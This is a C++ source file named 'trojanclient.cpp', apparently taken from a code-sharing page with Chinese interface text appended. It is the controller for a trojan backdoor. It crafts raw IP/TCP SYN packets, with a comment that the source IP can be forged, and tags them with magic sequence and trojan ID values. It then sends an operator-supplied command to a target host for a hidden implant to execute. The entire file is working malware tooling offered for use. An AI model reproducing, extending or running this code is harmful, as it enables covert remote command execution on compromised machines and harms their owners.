📄 trojanclient.cpp
字号:
#include "mysock.h"
#include <WS2TCPIP.H>
#define MAX_PACKET_SIZE 65536
#define SEQ_IDENTITY 12345
#define TROJAN_ID_IDENTITY 6789
#define SERVER_PORT 80
#define LOCAL_PORT 1234
//trojan packet header
typedef struct trojanhdr
{
unsigned long trojan_id;
unsigned short trojan_len;
}TROJANHEADER, *PTROJANHEADER;
//calculate checksum
unsigned short checksum(unsigned short * buffer, int size)
{
unsigned long cksum = 0;
while(size >1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
{
cksum += *(unsigned char*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (unsigned short)(~cksum);
}
//get local ip
unsigned long GetLocalIP()
{
char szLocalIP[20] = {0};
char szHostName[128+1] = "\0";
hostent *phe;
int i;
if( gethostname(szHostName, 128 ) == 0 ) {
// Get host adresses
phe = gethostbyname(szHostName);
for( i = 0; phe != NULL && phe->h_addr_list[i]!= NULL; i++ )
{
sprintf(szLocalIP, "%d.%d.%d.%d",
(UINT)((UCHAR*)phe->h_addr_list[i])[0],
(UINT)((UCHAR*)phe->h_addr_list[i])[1],
(UINT)((UCHAR*)phe->h_addr_list[i])[2],
(UINT)((UCHAR*)phe->h_addr_list[i])[3]);
}
}
else
return 0;
return inet_addr(szLocalIP);
}
int main(int argc, char* argv[])
{
int cmdlen;
char szDataBuf[MAX_PACKET_SIZE] = {0};
BOOL bOption;
WSADATA WSAData;
SOCKET nSock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
TROJANHEADER trojanHeader;
if (argc != 3)
{
printf("usage: %s targetip command",argv[0]);
return -1;
}
//get the command will execute
cmdlen = strlen(argv[2]);
char * pCommand = new char[cmdlen + 2];
memset(pCommand, 0, cmdlen + 2);
memcpy(pCommand, argv[2], cmdlen);
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
{
printf("wsastartup error : %d\n", WSAGetLastError());
return -1;
}
nSock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (INVALID_SOCKET == nSock)
{
printf("socket error : %d\n", WSAGetLastError());
free(pCommand);
closesocket(nSock);
WSACleanup();
return -1;
}
int nRet = setsockopt(nSock, IPPROTO_IP, IP_HDRINCL, (char*)&bOption, sizeof(bOption));
if (SOCKET_ERROR == nRet)
{
printf("setsockopt error : %d\n", WSAGetLastError());
free(pCommand);
closesocket(nSock);
WSACleanup();
return -1;
}
//fill in ip header
ipHeader.ver_and_len = (4 << 4) | (sizeof(IPHEADER) / sizeof(unsigned long));
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(IPHEADER) + sizeof(TCPHEADER));
ipHeader.ident = 0;
ipHeader.frag_and_flags = 0;
ipHeader.ttl = 128;
ipHeader.proto = IPPROTO_TCP;
ipHeader.checksum = 0;
ipHeader.sourceip = GetLocalIP(); //of course you can forge an ip
ipHeader.destinationip = inet_addr(argv[1]);
memcpy(szDataBuf, &ipHeader, sizeof(IPHEADER));
memcpy(szDataBuf + sizeof(IPHEADER), &tcpHeader, sizeof(TCPHEADER));
memset(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER), 0, 4);
ipHeader.checksum = checksum((unsigned short *)szDataBuf, sizeof(IPHEADER) + sizeof(TCPHEADER));
//fill in tcp header
tcpHeader.sourceport = htons(LOCAL_PORT); //make no difference
tcpHeader.destinationport = htons(SERVER_PORT); //make no difference
tcpHeader.seq = htons(SEQ_IDENTITY); //trojan seq ident
tcpHeader.ack = 345678;
tcpHeader.len_res_flag = (sizeof(TCPHEADER)/4 << 12) | (0 << 6) | SYN;
tcpHeader.windowsize = 512;
tcpHeader.urgenpointer = 0;
tcpHeader.checksum = 0;
//fill in trojan header
trojanHeader.trojan_id = htons(TROJAN_ID_IDENTITY);
trojanHeader.trojan_len = cmdlen;
//fill in psd header (use for calculate checksum)
psdHeader.sourceip = ipHeader.sourceip;
psdHeader.destinationip = ipHeader.destinationip;
psdHeader.mbz = 0;
psdHeader.proto = IPPROTO_TCP;
psdHeader.tcp_len = htons(sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen);
//calculate checksum
memcpy(szDataBuf, &psdHeader, sizeof(PSDHEADER));
memcpy(szDataBuf + sizeof(PSDHEADER), &tcpHeader, sizeof(TCPHEADER));
memcpy(szDataBuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), &trojanHeader, sizeof(TROJANHEADER));
memcpy(szDataBuf + sizeof(PSDHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), pCommand, cmdlen);
tcpHeader.checksum = checksum((unsigned short *)szDataBuf, sizeof(PSDHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen);
int total_len = sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen;
memset(szDataBuf, 0, total_len);
//fill in the buffer to send
memcpy(szDataBuf, &ipHeader, sizeof(IPHEADER));
memcpy(szDataBuf + sizeof(IPHEADER), &tcpHeader, sizeof(TCPHEADER));
memcpy(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER), &trojanHeader, sizeof(TROJANHEADER));
memcpy(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), pCommand, cmdlen);
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(SERVER_PORT);
addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
//send a command
printf("Start to send command...\n");
nRet = sendto(nSock,
szDataBuf,
sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen,
0,
(struct sockaddr*)&addr_in,
sizeof(addr_in));
if (SOCKET_ERROR == nRet)
{
printf("sendto error : %d\n", WSAGetLastError());
}
else
printf("Send OK!\n");
free(pCommand);
closesocket(nSock);
WSACleanup();
return 0;
} ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -